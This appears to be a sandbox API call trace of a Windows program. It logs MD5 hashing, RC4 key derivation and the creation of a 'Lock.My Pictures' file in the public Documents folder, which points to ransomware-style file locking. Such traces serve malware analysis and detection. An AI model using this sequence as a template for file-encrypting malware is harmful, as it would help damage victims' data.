PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.660] CryptCreateHash (in: hProv=0xa7c7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.660] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0223.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71cd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0223.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.661] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabbd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0223.661] CryptHashData (hHash=0x9e2138, pbData=0x2a71c58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0223.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.661] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0223.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabbc0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0223.662] CryptDeriveKey (in: hProv=0xa7c7f8, Algid=0x6601, hBaseData=0x9e2138, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.662] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.662] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.662] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0223.662] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0223.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f80, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0223.662] CryptDestroyHash (hHash=0x9e2138) returned 1 [0223.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.663] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/My Pictures" (normalized: "c:\\users\\public\\documents\\my pictures"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0223.663] GetLastError () returned 0x5 [0223.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0223.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.664] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0223.664] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.My Pictures" (normalized: "c:\\users\\public\\documents\\lock.my pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7080 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0223.665] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0223.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0223.666] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.666] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.667] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.667] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.667] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.668] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.668] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.668] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.668] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0223.668] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0223.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.668] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0223.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.668] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0223.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0223.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 